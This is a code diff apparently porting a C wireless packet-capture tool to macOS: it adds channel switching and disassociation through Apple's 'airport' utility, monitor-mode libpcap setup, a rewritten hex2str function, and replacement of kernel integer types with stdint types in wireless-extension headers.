108 | 130 | } |
109 | 131 | |
110 | return 0; | |
132 | return change_channel(channels[i]); | |
111 | 133 | } |
112 | 134 | |
113 | 135 | /* Sets the 802.11 channel for the selected interface */ |
136 | #ifdef __APPLE__ | |
137 | int change_channel(int channel) | |
138 | { | |
139 | cprintf(VERBOSE, "[+] Switching %s to channel %d\n", get_iface(), channel); | |
140 | // Unfortunately, there is no API to change the channel | |
141 | pid_t pid = fork(); | |
142 | if (!pid) { | |
143 | char chan_arg[32]; | |
144 | sprintf(chan_arg, "-c%d", channel); | |
145 | char* argv[] = {"/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", chan_arg, NULL}; | |
146 | execve("/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", argv, NULL); | |
147 | } | |
148 | int status; | |
149 | waitpid(pid,&status,0); | |
150 | set_channel(channel); | |
151 | return 0; | |
152 | } | |
153 | #else | |
114 | 154 | int change_channel(int channel) |
115 | 155 | { |
116 | 156 | int skfd = 0, ret_val = 0; |
145 | 185 | |
146 | 186 | return ret_val; |
147 | 187 | } |
188 | #endif⏎ |
34 | 34 | #define IFACE_H |
35 | 35 | |
36 | 36 | #include <sys/ioctl.h> |
37 | #ifdef __APPLE__ | |
38 | #include <sys/socket.h> | |
39 | #include <net/ethernet.h> | |
40 | #include <ifaddrs.h> | |
41 | #include <net/if_dl.h> | |
42 | #endif | |
37 | 43 | #include <net/if.h> |
38 | 44 | #include <netinet/in.h> |
45 | ||
46 | #ifndef __APPLE__ | |
39 | 47 | #include "lwe/iwlib.h" |
48 | #endif | |
40 | 49 | |
41 | 50 | #include "defs.h" |
42 | 51 | #include "globule.h" |
120 | 120 | pcap_t *handle = NULL; |
121 | 121 | char errbuf[PCAP_ERRBUF_SIZE] = { 0 }; |
122 | 122 | |
123 | handle = pcap_open_live(capture_source, BUFSIZ, 1, 0, errbuf); | |
123 | #ifdef __APPLE__ | |
124 | // must disassociate from any current AP. This is the only way. | |
125 | pid_t pid = fork(); | |
126 | if (!pid) { | |
127 | char* argv[] = {"/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", "-z", NULL}; | |
128 | execve("/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", argv, NULL); | |
129 | } | |
130 | int status; | |
131 | waitpid(pid,&status,0); | |
132 | ||
133 | ||
134 | handle = pcap_create(capture_source,errbuf); | |
135 | if (handle) { | |
136 | pcap_set_snaplen(handle, 65535); | |
137 | pcap_set_timeout(handle, 50); | |
138 | pcap_set_rfmon(handle, 1); | |
139 | pcap_set_promisc(handle, 1); | |
140 | int status = pcap_activate(handle); | |
141 | if (status) | |
142 | cprintf(CRITICAL, "pcap_activate status %d\n", status); | |
143 | } | |
144 | #else | |
145 | handle = pcap_open_live(capture_source, 65535, 1, 0, errbuf); | |
146 | #endif | |
124 | 147 | if(!handle) |
125 | 148 | { |
126 | 149 | handle = pcap_open_offline(capture_source, errbuf); |
303 | 303 | /* Convert raw data to a hex string */ |
304 | 304 | char *hex2str(unsigned char *hex, int len) |
305 | 305 | { |
306 | char *str = NULL; | |
307 | int str_len = 0, i = 0; | |
308 | char tmp_str[3] = { 0 }; | |
309 | ||
310 | str_len = (len * 2); | |
311 | ||
312 | str = malloc(str_len+1); | |
313 | if(str) | |
314 | { | |
315 | memset(str, 0, (str_len+1)); | |
316 | ||
317 | for(i=0; i<len; i++) | |
318 | { | |
319 | memset((char *) &tmp_str, 0, sizeof(tmp_str)); | |
320 | snprintf((char *) &tmp_str, sizeof(tmp_str), "%.2X", hex[i]); | |
321 | strncat(str, (char *) &tmp_str, 2); | |
322 | } | |
323 | } | |
324 | ||
325 | return str; | |
326 | } | |
306 | static const char atab[] = "0123456789abcdef"; | |
307 | char *str = malloc((len*2)+1), *out=str; | |
308 | if(!str) return 0; | |
309 | for(;len;hex++,len--) { | |
310 | *(out++) = atab[*hex >> 4]; | |
311 | *(out++) = atab[*hex & 0xf]; | |
312 | } | |
313 | *out = 0; | |
314 | return str; | |
315 | } | |
316 |
11 | 11 | #ifndef LIBWPS_H |
12 | 12 | #define LIBWPS_H |
13 | 13 | |
14 | #undef _GNU_SOURCE | |
15 | #define _GNU_SOURCE | |
16 | #include <sys/types.h> | |
14 | 17 | #include <stdlib.h> |
15 | 18 | #include <stdint.h> |
16 | 19 | #include <stdio.h> |
31 | 31 | */ |
32 | 32 | struct iw15_range |
33 | 33 | { |
34 | __u32 throughput; | |
35 | __u32 min_nwid; | |
36 | __u32 max_nwid; | |
37 | __u16 num_channels; | |
38 | __u8 num_frequency; | |
34 | uint32_t throughput; | |
35 | uint32_t min_nwid; | |
36 | uint32_t max_nwid; | |
37 | uint16_t num_channels; | |
38 | uint8_t num_frequency; | |
39 | 39 | struct iw_freq freq[IW15_MAX_FREQUENCIES]; |
40 | __s32 sensitivity; | |
40 | int32_t sensitivity; | |
41 | 41 | struct iw_quality max_qual; |
42 | __u8 num_bitrates; | |
43 | __s32 bitrate[IW15_MAX_BITRATES]; | |
44 | __s32 min_rts; | |
45 | __s32 max_rts; | |
46 | __s32 min_frag; | |
47 | __s32 max_frag; | |
48 | __s32 min_pmp; | |
49 | __s32 max_pmp; | |
50 | __s32 min_pmt; | |
51 | __s32 max_pmt; | |
52 | __u16 pmp_flags; | |
53 | __u16 pmt_flags; | |
54 | __u16 pm_capa; | |
55 | __u16 encoding_size[IW15_MAX_ENCODING_SIZES]; | |
56 | __u8 num_encoding_sizes; | |
57 | __u8 max_encoding_tokens; | |
58 | __u16 txpower_capa; | |
59 | __u8 num_txpower; | |
60 | __s32 txpower[IW15_MAX_TXPOWER]; | |
61 | __u8 we_version_compiled; | |
62 | __u8 we_version_source; | |
63 | __u16 retry_capa; | |
64 | __u16 retry_flags; | |
65 | __u16 r_time_flags; | |
66 | __s32 min_retry; | |
67 | __s32 max_retry; | |
68 | __s32 min_r_time; | |
69 | __s32 max_r_time; | |
42 | uint8_t num_bitrates; | |
43 | int32_t bitrate[IW15_MAX_BITRATES]; | |
44 | int32_t min_rts; | |
45 | int32_t max_rts; | |
46 | int32_t min_frag; | |
47 | int32_t max_frag; | |
48 | int32_t min_pmp; | |
49 | int32_t max_pmp; | |
50 | int32_t min_pmt; | |
51 | int32_t max_pmt; | |
52 | uint16_t pmp_flags; | |
53 | uint16_t pmt_flags; | |
54 | uint16_t pm_capa; | |
55 | uint16_t encoding_size[IW15_MAX_ENCODING_SIZES]; | |
56 | uint8_t num_encoding_sizes; | |
57 | uint8_t max_encoding_tokens; | |
58 | uint16_t txpower_capa; | |
59 | uint8_t num_txpower; | |
60 | int32_t txpower[IW15_MAX_TXPOWER]; | |
61 | uint8_t we_version_compiled; | |
62 | uint8_t we_version_source; | |
63 | uint16_t retry_capa; | |
64 | uint16_t retry_flags; | |
65 | uint16_t r_time_flags; | |
66 | int32_t min_retry; | |
67 | int32_t max_retry; | |
68 | int32_t min_r_time; | |
69 | int32_t max_r_time; | |
70 | 70 | struct iw_quality avg_qual; |
71 | 71 | }; |
72 | 72 | |
1657 | 1657 | const char * ifname, |
1658 | 1658 | const char * input, |
1659 | 1659 | unsigned char * key, |
1660 | __u16 * flags) | |
1660 | uint16_t * flags) | |
1661 | 1661 | { |
1662 | 1662 | int keylen = 0; |
1663 | 1663 | char * p; |
2314 | 2314 | 1, /* IW_PRIV_TYPE_BYTE */ |
2315 | 2315 | 1, /* IW_PRIV_TYPE_CHAR */ |
2316 | 2316 | 0, /* Not defined */ |
2317 | sizeof(__u32), /* IW_PRIV_TYPE_INT */ | |
2317 | sizeof(uint32_t), /* IW_PRIV_TYPE_INT */ | |
2318 | 2318 | sizeof(struct iw_freq), /* IW_PRIV_TYPE_FLOAT */ |
2319 | 2319 | sizeof(struct sockaddr), /* IW_PRIV_TYPE_ADDR */ |
2320 | 2320 | 0, /* Not defined */ |
2346 | 2346 | /* Type of headers we know about (basically union iwreq_data) */ |
2347 | 2347 | #define IW_HEADER_TYPE_NULL 0 /* Not available */ |
2348 | 2348 | #define IW_HEADER_TYPE_CHAR 2 /* char [IFNAMSIZ] */ |
2349 | #define IW_HEADER_TYPE_UINT 4 /* __u32 */ | |
2349 | #define IW_HEADER_TYPE_UINT 4 /* uint32_t */ | |
2350 | 2350 | #define IW_HEADER_TYPE_FREQ 5 /* struct iw_freq */ |
2351 | 2351 | #define IW_HEADER_TYPE_ADDR 6 /* struct sockaddr */ |
2352 | 2352 | #define IW_HEADER_TYPE_POINT 8 /* struct iw_point */ |
2373 | 2373 | */ |
2374 | 2374 | struct iw_ioctl_description |
2375 | 2375 | { |
2376 | __u8 header_type; /* NULL, iw_point or other */ | |
2377 | __u8 token_type; /* Future */ | |
2378 | __u16 token_size; /* Granularity of payload */ | |
2379 | __u16 min_tokens; /* Min acceptable token number */ | |
2380 | __u16 max_tokens; /* Max acceptable token number */ | |
2381 | __u32 flags; /* Special handling of the request */ | |
2376 | uint8_t header_type; /* NULL, iw_point or other */ | |
2377 | uint8_t token_type; /* Future */ | |
2378 | uint16_t token_size; /* Granularity of payload */ | |
2379 | uint16_t min_tokens; /* Min acceptable token number */ | |
2380 | uint16_t max_tokens; /* Max acceptable token number */ | |
2381 | uint32_t flags; /* Special handling of the request */ | |
2382 | 2382 | }; |
2383 | 2383 | |
2384 | 2384 | /* -------------------------- VARIABLES -------------------------- */ |
2826 | 2826 | * Fixing that in the kernel would break 64 bits userspace. */ |
2827 | 2827 | if((token_len != extra_len) && (extra_len >= 4)) |
2828 | 2828 | { |
2829 | __u16 alt_dlen = *((__u16 *) pointer); | |
2829 | uint16_t alt_dlen = *((uint16_t *) pointer); | |
2830 | 2830 | unsigned int alt_token_len = alt_dlen * descr->token_size; |
2831 | 2831 | if((alt_token_len + 8) == extra_len) |
2832 | 2832 | { |
16 | 16 | /***************************** INCLUDES *****************************/ |
17 | 17 | |
18 | 18 | /* Standard headers */ |
19 | #undef _GNU_SOURCE | |
20 | #define _GNU_SOURCE | |
21 | #undef _BSD_SOURCE | |
22 | #define _BSD_SOURCE | |
19 | 23 | #include <sys/types.h> |
20 | 24 | #include <sys/ioctl.h> |
21 | 25 | #include <stdio.h> |
44 | 48 | #include <netinet/in.h> /* For struct sockaddr_in */ |
45 | 49 | #include <netinet/if_ether.h> |
46 | 50 | |
47 | /* Fixup to be able to include kernel includes in userspace. | |
48 | * Basically, kill the sparse annotations... Jean II */ | |
49 | #ifndef __user | |
50 | #define __user | |
51 | #endif | |
52 | ||
53 | #include <linux/types.h> /* for "caddr_t" et al */ | |
54 | ||
55 | /* Glibc systems headers are supposedly less problematic than kernel ones */ | |
51 | /* system headers are supposedly less problematic than kernel ones */ | |
56 | 52 | #include <sys/socket.h> /* for "struct sockaddr" et al */ |
57 | 53 | #include <net/if.h> /* for IFNAMSIZ and co... */ |
58 | 54 | |
128 | 124 | #define IW_EV_LCP_PK_LEN (4) |
129 | 125 | /* Size of the various events when packed in stream */ |
130 | 126 | #define IW_EV_CHAR_PK_LEN (IW_EV_LCP_PK_LEN + IFNAMSIZ) |
131 | #define IW_EV_UINT_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(__u32)) | |
127 | #define IW_EV_UINT_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(uint32_t)) | |
132 | 128 | #define IW_EV_FREQ_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(struct iw_freq)) |
133 | 129 | #define IW_EV_PARAM_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(struct iw_param)) |
134 | 130 | #define IW_EV_ADDR_PK_LEN (IW_EV_LCP_PK_LEN + sizeof(struct sockaddr)) |
137 | 133 | |
138 | 134 | struct iw_pk_event |
139 | 135 | { |
140 | __u16 len; /* Real lenght of this stuff */ | |
141 | __u16 cmd; /* Wireless IOCTL */ | |
136 | uint16_t len; /* Real lenght of this stuff */ | |
137 | uint16_t cmd; /* Wireless IOCTL */ | |
142 | 138 | union iwreq_data u; /* IOCTL fixed payload */ |
143 | 139 | } __attribute__ ((packed)); |
144 | 140 | struct iw_pk_point |
145 | 141 | { |
146 | void __user *pointer; /* Pointer to the data (in user space) */ | |
147 | __u16 length; /* number of fields or size in bytes */ | |
148 | __u16 flags; /* Optional params */ | |
142 | void *pointer; /* Pointer to the data (in user space) */ | |
143 | uint16_t length; /* number of fields or size in bytes */ | |
144 | uint16_t flags; /* Optional params */ | |
149 | 145 | } __attribute__ ((packed)); |
150 | 146 | |
151 | 147 | #define IW_EV_LCP_PK2_LEN (sizeof(struct iw_pk_event) - sizeof(union iwreq_data)) |
383 | 379 | const char * ifname, |
384 | 380 | const char * input, |
385 | 381 | unsigned char * key, |
386 | __u16 * flags); | |
382 | uint16_t * flags); | |
387 | 383 | /* ----------------- POWER MANAGEMENT SUBROUTINES ----------------- */ |
388 | 384 | void |
389 | 385 | iw_print_pm_value(char * buffer, |
501 | 497 | /* |
502 | 498 | * Wrapper to push some Wireless Parameter in the driver |
503 | 499 | */ |
504 | static inline int | |
500 | static int | |
505 | 501 | iw_set_ext(int skfd, /* Socket to the kernel */ |
506 | 502 | const char * ifname, /* Device name */ |
507 | 503 | int request, /* WE ID */ |
517 | 513 | /* |
518 | 514 | * Wrapper to extract some Wireless Parameter out of the driver |
519 | 515 | */ |
520 | static inline int | |
516 | static int | |
521 | 517 | iw_get_ext(int skfd, /* Socket to the kernel */ |
522 | 518 | const char * ifname, /* Device name */ |
523 | 519 | int request, /* WE ID */ |
8 | 8 | |
9 | 9 | #ifndef _LINUX_WIRELESS_H |
10 | 10 | #define _LINUX_WIRELESS_H |
11 | ||
12 | #include <stdint.h> | |
11 | 13 | |
12 | 14 | /************************** DOCUMENTATION **************************/ |
13 | 15 | /* |
71 | 73 | /* This header is used in user-space, therefore need to be sanitised |
72 | 74 | * for that purpose. Those includes are usually not compatible with glibc. |
73 | 75 | * To know which includes to use in user-space, check iwlib.h. */ |
74 | #ifdef __KERNEL__ | |
75 | #include <linux/types.h> /* for "caddr_t" et al */ | |
76 | #include <linux/socket.h> /* for "struct sockaddr" et al */ | |
77 | #include <linux/if.h> /* for IFNAMSIZ and co... */ | |
78 | #endif /* __KERNEL__ */ | |
79 | 76 | |
80 | 77 | /***************************** VERSION *****************************/ |
81 | 78 | /* |
668 | 665 | */ |
669 | 666 | struct iw_param |
670 | 667 | { |
671 | __s32 value; /* The value of the parameter itself */ | |
672 | __u8 fixed; /* Hardware should not use auto select */ | |
673 | __u8 disabled; /* Disable the feature */ | |
674 | __u16 flags; /* Various specifc flags (if any) */ | |
668 | int32_t value; /* The value of the parameter itself */ | |
669 | uint8_t fixed; /* Hardware should not use auto select */ | |
670 | uint8_t disabled; /* Disable the feature */ | |
671 | uint16_t flags; /* Various specifc flags (if any) */ | |
675 | 672 | }; |
676 | 673 | |
677 | 674 | /* |
680 | 677 | */ |
681 | 678 | struct iw_point |
682 | 679 | { |
683 | void __user *pointer; /* Pointer to the data (in user space) */ | |
684 | __u16 length; /* number of fields or size in bytes */ | |
685 | __u16 flags; /* Optional params */ | |
680 | void *pointer; /* Pointer to the data (in user space) */ | |
681 | uint16_t length; /* number of fields or size in bytes */ | |
682 | uint16_t flags; /* Optional params */ | |
686 | 683 | }; |
687 | 684 | |
688 | 685 | /* |
695 | 692 | */ |
696 | 693 | struct iw_freq |
697 | 694 | { |
698 | __s32 m; /* Mantissa */ | |
699 | __s16 e; /* Exponent */ | |
700 | __u8 i; /* List index (when in range struct) */ | |
701 | __u8 flags; /* Flags (fixed/auto) */ | |
695 | int32_t m; /* Mantissa */ | |
696 | int16_t e; /* Exponent */ | |
697 | uint8_t i; /* List index (when in range struct) */ | |
698 | uint8_t flags; /* Flags (fixed/auto) */ | |
702 | 699 | }; |
703 | 700 | |
704 | 701 | /* |
706 | 703 | */ |
707 | 704 | struct iw_quality |
708 | 705 | { |
709 | __u8 qual; /* link quality (%retries, SNR, | |
706 | uint8_t qual; /* link quality (%retries, SNR, | |
710 | 707 | %missed beacons or better...) */ |
711 | __u8 level; /* signal level (dBm) */ | |
712 | __u8 noise; /* noise level (dBm) */ | |
713 | __u8 updated; /* Flags to know if updated */ | |
708 | uint8_t level; /* signal level (dBm) */ | |
709 | uint8_t noise; /* noise level (dBm) */ | |
710 | uint8_t updated; /* Flags to know if updated */ | |
714 | 711 | }; |
715 | 712 | |
716 | 713 | /* |
722 | 719 | */ |
723 | 720 | struct iw_discarded |
724 | 721 | { |
725 | __u32 nwid; /* Rx : Wrong nwid/essid */ | |
726 | __u32 code; /* Rx : Unable to code/decode (WEP) */ | |
727 | __u32 fragment; /* Rx : Can't perform MAC reassembly */ | |
728 | __u32 retries; /* Tx : Max MAC retries num reached */ | |
729 | __u32 misc; /* Others cases */ | |
722 | uint32_t nwid; /* Rx : Wrong nwid/essid */ | |
723 | uint32_t code; /* Rx : Unable to code/decode (WEP) */ | |
724 | uint32_t fragment; /* Rx : Can't perform MAC reassembly */ | |
725 | uint32_t retries; /* Tx : Max MAC retries num reached */ | |
726 | uint32_t misc; /* Others cases */ | |
730 | 727 | }; |
731 | 728 | |
732 | 729 | /* |
735 | 732 | */ |
736 | 733 | struct iw_missed |
737 | 734 | { |
738 | __u32 beacon; /* Missed beacons/superframe */ | |
735 | uint32_t beacon; /* Missed beacons/superframe */ | |
739 | 736 | }; |
740 | 737 | |
741 | 738 | /* |
762 | 759 | */ |
763 | 760 | struct iw_scan_req |
764 | 761 | { |
765 | __u8 scan_type; /* IW_SCAN_TYPE_{ACTIVE,PASSIVE} */ | |
766 | __u8 essid_len; | |
767 | __u8 num_channels; /* num entries in channel_list; | |
762 | uint8_t scan_type; /* IW_SCAN_TYPE_{ACTIVE,PASSIVE} */ | |
763 | uint8_t essid_len; | |
764 | uint8_t num_channels; /* num entries in channel_list; | |
768 | 765 | * 0 = scan all allowed channels */ |
769 | __u8 flags; /* reserved as padding; use zero, this may | |
766 | uint8_t flags; /* reserved as padding; use zero, this may | |
770 | 767 | * be used in the future for adding flags |
771 | 768 | * to request different scan behavior */ |
772 | 769 | struct sockaddr bssid; /* ff:ff:ff:ff:ff:ff for broadcast BSSID or |
778 | 775 | * without having to change the current ESSID and potentially breaking |
779 | 776 | * the current association. |
780 | 777 | */ |
781 | __u8 essid[IW_ESSID_MAX_SIZE]; | |
778 | uint8_t essid[IW_ESSID_MAX_SIZE]; | |
782 | 779 | |
783 | 780 | /* |
784 | 781 | * Optional parameters for changing the default scanning behavior. |
790 | 787 | * replies are received, total time waited on the channel is defined by |
791 | 788 | * max_channel_time. |
792 | 789 | */ |
793 | __u32 min_channel_time; /* in TU */ | |
794 | __u32 max_channel_time; /* in TU */ | |
790 | uint32_t min_channel_time; /* in TU */ | |
791 | uint32_t max_channel_time; /* in TU */ | |
795 | 792 | |
796 | 793 | struct iw_freq channel_list[IW_MAX_FREQUENCIES]; |
797 | 794 | }; |
824 | 821 | */ |
825 | 822 | struct iw_encode_ext |
826 | 823 | { |
827 | __u32 ext_flags; /* IW_ENCODE_EXT_* */ | |
828 | __u8 tx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */ | |
829 | __u8 rx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */ | |
824 | uint32_t ext_flags; /* IW_ENCODE_EXT_* */ | |
825 | uint8_t tx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */ | |
826 | uint8_t rx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */ | |
830 | 827 | struct sockaddr addr; /* ff:ff:ff:ff:ff:ff for broadcast/multicast |
831 | 828 | * (group) keys or unicast address for |
832 | 829 | * individual keys */ |
833 | __u16 alg; /* IW_ENCODE_ALG_* */ | |
834 | __u16 key_len; | |
835 | __u8 key[0]; | |
830 | uint16_t alg; /* IW_ENCODE_ALG_* */ | |
831 | uint16_t key_len; | |
832 | uint8_t key[0]; | |
836 | 833 | }; |
837 | 834 | |
838 | 835 | /* SIOCSIWMLME data */ |
839 | 836 | struct iw_mlme |
840 | 837 | { |
841 | __u16 cmd; /* IW_MLME_* */ | |
842 | __u16 reason_code; | |
838 | uint16_t cmd; /* IW_MLME_* */ | |
839 | uint16_t reason_code; | |
843 | 840 | struct sockaddr addr; |
844 | 841 | }; |
845 | 842 | |
852 | 849 | |
853 | 850 | struct iw_pmksa |
854 | 851 | { |
855 | __u32 cmd; /* IW_PMKSA_* */ | |
852 | uint32_t cmd; /* IW_PMKSA_* */ | |
856 | 853 | struct sockaddr bssid; |
857 | __u8 pmkid[IW_PMKID_LEN]; | |
854 | uint8_t pmkid[IW_PMKID_LEN]; | |
858 | 855 | }; |
859 | 856 | |
860 | 857 | /* IWEVMICHAELMICFAILURE data */ |
861 | 858 | struct iw_michaelmicfailure |
862 | 859 | { |
863 | __u32 flags; | |
860 | uint32_t flags; | |
864 | 861 | struct sockaddr src_addr; |
865 | __u8 tsc[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */ | |
862 | uint8_t tsc[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */ | |
866 | 863 | }; |
867 | 864 | |
868 | 865 | /* IWEVPMKIDCAND data */ |
869 | 866 | #define IW_PMKID_CAND_PREAUTH 0x00000001 /* RNS pre-authentication enabled */ |
870 | 867 | struct iw_pmkid_cand |
871 | 868 | { |
872 | __u32 flags; /* IW_PMKID_CAND_* */ | |
873 | __u32 index; /* the smaller the index, the higher the | |
869 | uint32_t flags; /* IW_PMKID_CAND_* */ | |
870 | uint32_t index; /* the smaller the index, the higher the | |
874 | 871 | * priority */ |
875 | 872 | struct sockaddr bssid; |
876 | 873 | }; |
881 | 878 | */ |
882 | 879 | struct iw_statistics |
883 | 880 | { |
884 | __u16 status; /* Status | |
881 | uint16_t status; /* Status | |
885 | 882 | * - device dependent for now */ |
886 | 883 | |
887 | 884 | struct iw_quality qual; /* Quality of the link |
919 | 916 | struct iw_param txpower; /* default transmit power */ |
920 | 917 | struct iw_param rts; /* RTS threshold threshold */ |
921 | 918 | struct iw_param frag; /* Fragmentation threshold */ |
922 | __u32 mode; /* Operation mode */ | |
919 | uint32_t mode; /* Operation mode */ | |
923 | 920 | struct iw_param retry; /* Retry limits & lifetime */ |
924 | 921 | |
925 | 922 | struct iw_point encoding; /* Encoding stuff : tokens */ |
963 | 960 | struct iw_range |
964 | 961 | { |
965 | 962 | /* Informative stuff (to choose between different interface) */ |
966 | __u32 throughput; /* To give an idea... */ | |
963 | uint32_t throughput; /* To give an idea... */ | |
967 | 964 | /* In theory this value should be the maximum benchmarked |
968 | 965 | * TCP/IP throughput, because with most of these devices the |
969 | 966 | * bit rate is meaningless (overhead an co) to estimate how |
972 | 969 | */ |
973 | 970 | |
974 | 971 | /* NWID (or domain id) */ |
975 | __u32 min_nwid; /* Minimal NWID we are able to set */ | |
976 | __u32 max_nwid; /* Maximal NWID we are able to set */ | |
972 | uint32_t min_nwid; /* Minimal NWID we are able to set */ | |
973 | uint32_t max_nwid; /* Maximal NWID we are able to set */ | |
977 | 974 | |
978 | 975 | /* Old Frequency (backward compat - moved lower ) */ |
979 | __u16 old_num_channels; | |
980 | __u8 old_num_frequency; | |
976 | uint16_t old_num_channels; | |
977 | uint8_t old_num_frequency; | |
981 | 978 | |
982 | 979 | /* Wireless event capability bitmasks */ |
983 | __u32 event_capa[6]; | |
980 | uint32_t event_capa[6]; | |
984 | 981 | |
985 | 982 | /* signal level threshold range */ |
986 | __s32 sensitivity; | |
983 | int32_t sensitivity; | |
987 | 984 | |
988 | 985 | /* Quality of link & SNR stuff */ |
989 | 986 | /* Quality range (link, level, noise) |
1003 | 1000 | struct iw_quality avg_qual; /* Quality of the link */ |
1004 | 1001 | |
1005 | 1002 | /* Rates */ |
1006 | __u8 num_bitrates; /* Number of entries in the list */ | |
1007 | __s32 bitrate[IW_MAX_BITRATES]; /* list, in bps */ | |
1003 | uint8_t num_bitrates; /* Number of entries in the list */ | |
1004 | int32_t bitrate[IW_MAX_BITRATES]; /* list, in bps */ | |
1008 | 1005 | |
1009 | 1006 | /* RTS threshold */ |
1010 | __s32 min_rts; /* Minimal RTS threshold */ | |
1011 | __s32 max_rts; /* Maximal RTS threshold */ | |
1007 | int32_t min_rts; /* Minimal RTS threshold */ | |
1008 | int32_t max_rts; /* Maximal RTS threshold */ | |
1012 | 1009 | |
1013 | 1010 | /* Frag threshold */ |
1014 | __s32 min_frag; /* Minimal frag threshold */ | |
1015 | __s32 max_frag; /* Maximal frag threshold */ | |
1011 | int32_t min_frag; /* Minimal frag threshold */ | |
1012 | int32_t max_frag; /* Maximal frag threshold */ | |
1016 | 1013 | |
1017 | 1014 | /* Power Management duration & timeout */ |
1018 | __s32 min_pmp; /* Minimal PM period */ | |
1019 | __s32 max_pmp; /* Maximal PM period */ | |
1020 | __s32 min_pmt; /* Minimal PM timeout */ | |
1021 | __s32 max_pmt; /* Maximal PM timeout */ | |
1022 | __u16 pmp_flags; /* How to decode max/min PM period */ | |
1023 | __u16 pmt_flags; /* How to decode max/min PM timeout */ | |
1024 | __u16 pm_capa; /* What PM options are supported */ | |
1015 | int32_t min_pmp; /* Minimal PM period */ | |
1016 | int32_t max_pmp; /* Maximal PM period */ | |
1017 | int32_t min_pmt; /* Minimal PM timeout */ | |
1018 | int32_t max_pmt; /* Maximal PM timeout */ | |
1019 | uint16_t pmp_flags; /* How to decode max/min PM period */ | |
1020 | uint16_t pmt_flags; /* How to decode max/min PM timeout */ | |
1021 | uint16_t pm_capa; /* What PM options are supported */ | |
1025 | 1022 | |
1026 | 1023 | /* Encoder stuff */ |
1027 | __u16 encoding_size[IW_MAX_ENCODING_SIZES]; /* Different token sizes */ | |
1028 | __u8 num_encoding_sizes; /* Number of entry in the list */ | |
1029 | __u8 max_encoding_tokens; /* Max number of tokens */ | |
1024 | uint16_t encoding_size[IW_MAX_ENCODING_SIZES]; /* Different token sizes */ | |
1025 | uint8_t num_encoding_sizes; /* Number of entry in the list */ | |
1026 | uint8_t max_encoding_tokens; /* Max number of tokens */ | |
1030 | 1027 | /* For drivers that need a "login/passwd" form */ |
1031 | __u8 encoding_login_index; /* token index for login token */ | |
1028 | uint8_t encoding_login_index; /* token index for login token */ | |
1032 | 1029 | |
1033 | 1030 | /* Transmit power */ |
1034 | __u16 txpower_capa; /* What options are supported */ | |
1035 | __u8 num_txpower; /* Number of entries in the list */ | |
1036 | __s32 txpower[IW_MAX_TXPOWER]; /* list, in bps */ | |
1031 | uint16_t txpower_capa; /* What options are supported */ | |
1032 | uint8_t num_txpower; /* Number of entries in the list */ | |
1033 | int32_t txpower[IW_MAX_TXPOWER]; /* list, in bps */ | |
1037 | 1034 | |
1038 | 1035 | /* Wireless Extension version info */ |
1039 | __u8 we_version_compiled; /* Must be WIRELESS_EXT */ | |
1040 | __u8 we_version_source; /* Last update of source */ | |
1036 | uint8_t we_version_compiled; /* Must be WIRELESS_EXT */ | |
1037 | uint8_t we_version_source; /* Last update of source */ | |
1041 | 1038 | |
1042 | 1039 | /* Retry limits and lifetime */ |
1043 | __u16 retry_capa; /* What retry options are supported */ | |
1044 | __u16 retry_flags; /* How to decode max/min retry limit */ | |
1045 | __u16 r_time_flags; /* How to decode max/min retry life */ | |
1046 | __s32 min_retry; /* Minimal number of retries */ | |
1047 | __s32 max_retry; /* Maximal number of retries */ | |
1048 | __s32 min_r_time; /* Minimal retry lifetime */ | |
1049 | __s32 max_r_time; /* Maximal retry lifetime */ | |
1040 | uint16_t retry_capa; /* What retry options are supported */ | |
1041 | uint16_t retry_flags; /* How to decode max/min retry limit */ | |
1042 | uint16_t r_time_flags; /* How to decode max/min retry life */ | |
1043 | int32_t min_retry; /* Minimal number of retries */ | |
1044 | int32_t max_retry; /* Maximal number of retries */ | |
1045 | int32_t min_r_time; /* Minimal retry lifetime */ | |
1046 | int32_t max_r_time; /* Maximal retry lifetime */ | |
1050 | 1047 | |
1051 | 1048 | /* Frequency */ |
1052 | __u16 num_channels; /* Number of channels [0; num - 1] */ | |
1053 | __u8 num_frequency; /* Number of entry in the list */ | |
1049 | uint16_t num_channels; /* Number of channels [0; num - 1] */ | |
1050 | uint8_t num_frequency; /* Number of entry in the list */ | |
1054 | 1051 | struct iw_freq freq[IW_MAX_FREQUENCIES]; /* list */ |
1055 | 1052 | /* Note : this frequency list doesn't need to fit channel numbers, |
1056 | 1053 | * because each entry contain its channel index */ |
1057 | 1054 | |
1058 | __u32 enc_capa; /* IW_ENC_CAPA_* bit field */ | |
1055 | uint32_t enc_capa; /* IW_ENC_CAPA_* bit field */ | |
1059 | 1056 | |
1060 | 1057 | /* More power management stuff */ |
1061 | __s32 min_pms; /* Minimal PM saving */ | |
1062 | __s32 max_pms; /* Maximal PM saving */ | |
1063 | __u16 pms_flags; /* How to decode max/min PM saving */ | |
1058 | int32_t min_pms; /* Minimal PM saving */ | |
1059 | int32_t max_pms; /* Maximal PM saving */ | |
1060 | uint16_t pms_flags; /* How to decode max/min PM saving */ | |
1064 | 1061 | |
1065 | 1062 | /* All available modulations for driver (hw may support less) */ |
1066 | __s32 modul_capa; /* IW_MODUL_* bit field */ | |
1063 | int32_t modul_capa; /* IW_MODUL_* bit field */ | |
1067 | 1064 | |
1068 | 1065 | /* More bitrate stuff */ |
1069 | __u32 bitrate_capa; /* Types of bitrates supported */ | |
1066 | uint32_t bitrate_capa; /* Types of bitrates supported */ | |
1070 | 1067 | }; |
1071 | 1068 | |
1072 | 1069 | /* |
1075 | 1072 | |
1076 | 1073 | struct iw_priv_args |
1077 | 1074 | { |
1078 | __u32 cmd; /* Number of the ioctl to issue */ | |
1079 | __u16 set_args; /* Type and number of args */ | |
1080 | __u16 get_args; /* Type and number of args */ | |
1075 | uint32_t cmd; /* Number of the ioctl to issue */ | |
1076 | uint16_t set_args; /* Type and number of args */ | |
